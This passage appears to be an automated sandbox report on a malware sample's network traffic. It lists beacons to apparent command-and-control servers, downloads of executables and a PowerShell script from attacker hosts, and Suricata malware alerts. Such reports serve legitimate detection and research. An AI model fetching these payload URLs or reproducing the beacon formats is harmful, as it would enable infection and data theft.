Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJDAFBKFIECBGCAKECG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/file1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005627001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/k4pDgO.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 32 38 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005628041&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 35 36 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1005637001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005642001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005643001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMTIf-None-Match: "67328ac8-1bb200"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d 0a Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build"mars------FIDHIEBAAKJDHIECAAFH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005644031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005645001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 2d 2d 0d 0a Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="build"mars------FIDGHIIECGHDHJKFCAEG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"mars------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="build"mars------AKKEGHJDHDAFHIDHCFHD--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49758 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49957 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50236 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50245 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50252 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50256 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50257 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50260 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50263 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50264 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50270 -> 23.210.122.61:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50273 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50276 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50285 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50286 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50290 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50292 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50293 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50296 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50297 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50304 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50306 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50309 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50313 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50311 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50316 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50324 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49732
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50265 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50262 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50269 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50272 -> 176.9.192.202:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:50222
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73CC60 PR_Recv, 0_2_6C73CC60
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
